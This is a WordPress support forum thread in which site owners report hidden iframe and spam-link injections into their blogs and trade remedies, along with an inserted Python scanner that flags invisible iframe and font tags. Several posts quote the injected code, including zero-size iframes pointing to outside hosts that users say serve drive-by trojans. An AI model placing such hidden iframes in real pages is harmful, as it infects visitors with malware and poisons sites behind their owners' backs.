• Hi,

    I’ve searched around for a resolution to my problem but the closest thread I can find is this: https://www.remarpro.com/support/topic/89912?replies=4

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page https://www.heroes-hype.com. The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for https://xx.xx.xx.xx./iframe/wp-stats.php

    (the ‘x’ is an IP address which I don’t recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a week later and the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    “Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you’re using (which has also been called into question as of late).”

    So now I’m wondering whether anyone can corroborate that this is the likely reason..and whether there is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advice would be much appreciated.

    PS I am using the CSS Freak theme.

Viewing 14 replies - 76 through 89 (of 89 total)
  • @duskglow: excellent work isolating the problem and identifying an instant workaround/fix.

    Glad to see that the problem was found and the wordpress folks have released a patch.

    I’m sure a couple people here are happy to find out that they really weren’t crazy after all.

    Thanks

    So, if we upgraded to 2.3.2, this is no longer an issue?

    Version 2.3.3 and I’m still getting spam injection.

    <font style="position: absolute;overflow: hidden;height: 0;width: 0">
    absorption disposition and elimination of alcohol 1 g zithromax activities for alcohol and drug classes
    etc..etc..etc..
    </font>

    This was mentioned in this thread previously but it seems to have been overlooked. This seems very similar to the iframe injection. It shows up in a post after it’s been published, no modify or edit noticed.

    I’m getting code injected into posts on one of my blogs as well, and I just upgraded to 2.3.3 to try and prevent this and it happened again

    Same as Fluxinul:

    <font style="position: absolute;overflow: hidden;height: 0;width: 0"><!--4848--><a href="
    100s of spam links
    </font>

    How do I lock this down?

    I found at least part of our problem, it appears that the wordpress db user didn’t have alter privileges on the db. So the db upgrade to 2.3.2 and then 2.3.3 from a very old version, didn’t work completely. It didn’t fail completely either which is something that should be fixed.

    We have done a force db upgrade and things are acting fairly normal now, we’ll see how the spam injection goes.

    I wrote more about how to fix all this:
    https://www.bontb.com/2008/03/wp-content1-trojan-virus-for-wordpress-bloggers/

    I have 2.3.3 and the problem is I started seeing logs from SQL since March 11th!

    Now my suggestion also is to remove all users from wp-register if you don’t need them…

    Having the same sort of problem. I have this which seems like it is implanted in all files.. bummer
    <IFRAME src="https://www.dms-clan.de/vwar/upload/index.html"
    width="0" height="0" frameborder="0"></iframe>
    <IFRAME src="https://www.dms-clan.de/vwar/upload/index.html"
    width="0" height="0" frameborder="0"></iframe>

    Plus Google has sent this message to me..
    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Any ideas, anyone, on where this is coming from? I haven’t got a blog, only a guestbook.

    Got this one on one of two of my ver 2.3.3 blogs: the wp-settings.php file was infected with an iframe injection to some stat.php page. I deleted the code on both sites and upgraded one to 2.5. Now this weekend I find the other blog infected again with the code below.

    #iframe src='https://mystabcounter.info/index2.php' width='6' height='6' style='visibility: hidden;'></iframe#
    (I have replaced the brackets with #)

    Googling this site suggests it launches drive-by malware type trojans.
    This time though it was in every wp file in the root of the blog. I downloaded everything including plugins and themes and scanned with a search/replace program to search only for the offending code and only found it in the root files. I have now deleted all WordPress files and upgraded to ver 2.5 on that one. I have other blogs on ver 2.3.3 on the same server that seem OK but I will gradually change them over to 2.5 as well.

    I notified my host, who are looking into it, but can’t be sure if it was just WordPress as I have basic plugins and not much else that I have used for years; the only change was first 2.3.3 over Xmas on all blogs.

    I noticed it by checking my feed links on the blog; the injection breaks the feed and displays the iframe code on the screen (if you use Firefox to view), so I would advise everyone to click around their blog and especially the feed to see if anything looks wrong. Also just download your entire website and scan the files with a search/replace program set to search only for iframe code. I used Handytools searchreplace as it’s nice and simple and easy to just point it at a folder and let it run, searching subfolders as well.

    Regards

    Rob
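
The file scan described in the post above, sketched as an added example (not code from the thread, from WordPress, or from any tool named here): it flags `iframe` and `font` tags styled to be invisible, which is the shape every injected snippet quoted in this thread shares. The 1 px threshold, the file-suffix list and the sample with its placeholder hosts are assumptions constructed for illustration.

```python
import re
from pathlib import Path

TAG_RE = re.compile(r"<\s*(iframe|font)\b([^>]*)>", re.IGNORECASE)
# width/height given as an HTML attribute (width=0, width="1") or as CSS (width: 0)
DIM_RE = re.compile(r"\b(width|height)\s*[=:]\s*[\"']?\s*(\d+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)
MAX_INVISIBLE_PX = 1  # assumption: 0 or 1 px in both dimensions is meant to be unseen
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".xml"}  # assumption: adjust per site

def scan_text(text):
    """Return (line, tag, src) for each iframe/font tag styled to be invisible."""
    findings = []
    for m in TAG_RE.finditer(text):
        tag, attrs = m.group(1).lower(), m.group(2)
        dims = {name.lower(): int(val) for name, val in DIM_RE.findall(attrs)}
        tiny = len(dims) == 2 and max(dims.values()) <= MAX_INVISIBLE_PX
        if tiny or HIDDEN_RE.search(attrs):
            src = SRC_RE.search(attrs)
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, tag, src.group(1) if src else None))
    return findings

def scan_tree(root):
    """Scan a downloaded copy of the site; return {path: findings} for files with hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample modelled on the snippets quoted in this thread (placeholder hosts).
SAMPLE = """<?php get_header(); ?>
<!-- Traffic Statistics --> <iframe src=http://192.0.2.10/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<IFRAME src="http://injected.example.invalid/index.html"
width="0" height="0" frameborder="0"></iframe>
<iframe src='http://injected.example.invalid/index2.php' width='6' height='6' style='visibility: hidden;'></iframe>
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://spam.example.invalid/">spam</a></font>
<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>
"""

if __name__ == "__main__":
    for line, tag, src in scan_text(SAMPLE):
        print(f"line {line}: hidden <{tag}> src={src}")
```

Spam injected into post bodies lives in the database rather than in files, so `scan_text` would have to be run over exported post content to catch it.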

    I have WP 2.5 and no “strange” plugins and got the same injection today… looks like this <!-- Traffic Statistics --> <iframe src=https://xx.xxx.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> and of course it downloads a trojan… my AV told me… still no fix for this?

    I read that the best solution is to temporarily remove xmlrpc.php from host – I did this.

    Will there be a fix to the problem or will it go into the version 2.6 or whatever you call it?

    If the problem exists, no one has been able to replicate it or provide logs or other evidence that might give a hint as to the cause.

    DraxOfAvalon: did you catch your blog being exploited in your logs? Was your blog a fresh 2.5 install or an upgrade to 2.5 from a previous version?

    Alright here is some more information from my end in hopes that it can help things..

    I had an issue in the past with the iframe injection into a couple of my blogs (back then I had only about 8), I removed the code and upgraded to the newest version of wordpress. Unfortunately I only documented the code and not the actual sites that it was found on. This was probably 4-6 months ago and since had not had any issues until last week.

    Most of my blogs hold position within google for terms that get me sales on a daily basis. At the beginning of last week I noticed a drop in sales, and upon searching on google noticed a link underneath my blog saying “This site may harm your computer”. Upon looking further into it I realized that someone had once again injected code into my posts.

    I removed it, upgraded to 2.5, asked google to reanalyze my site, and about 5 days later the link was removed and I was back to business (or so I thought). During this time frame, I upgraded my 170+ wordpress blogs to 2.5 (a MAJOR pain in the butt), and scanned posts on the others to make sure the code had not been injected. After the countless amount of hours spent, I assumed I had solved the issue. Well the past two days I noticed a decrease in my main money making blog, and upon checking google I saw the damn “This site may harm your computer” link again, this time on a new site which had never had it before.

    I am positive the code was not there last week when I upgraded to 2.5, and was injected since. Searching around on google I cannot seem to find much information on how to resolve the issue, which is how I happened upon this page. When potential customers click my site, it takes them to a google page warning them, so I essentially lose ALL of my sales during the down time. I am pissed to say the least.

    When I went through the sites checking posts and upgrading to 2.5 I notated the ones which had been injected, and going through them the only plugin that they share would be “Google XML Sitemaps by Arne Brachhold”. Could this be the issue? That I have the sitemap files set to CHMOD 666?

    So, the blogs which were injected, were upgraded to 2.5 from a previous version of wordpress. I will have to start the time consuming process of manually checking the posts on all 170+ blogs again to see if any others are compromised.

    This is costing me a ridiculous amount of money, I would appreciate any input on how I can secure these blogs and resolve the issue, which is why I provided so much. I will check back often so if you have any questions regarding my situation I will happily answer them.

    It should also be noted that I do allow both user registrations and comments on these blogs, but require moderation for comments. Had not seen anything fishy when approving comments. Should I turn off user registrations?

  • The topic ‘iframe injection problem?’ is closed to new replies.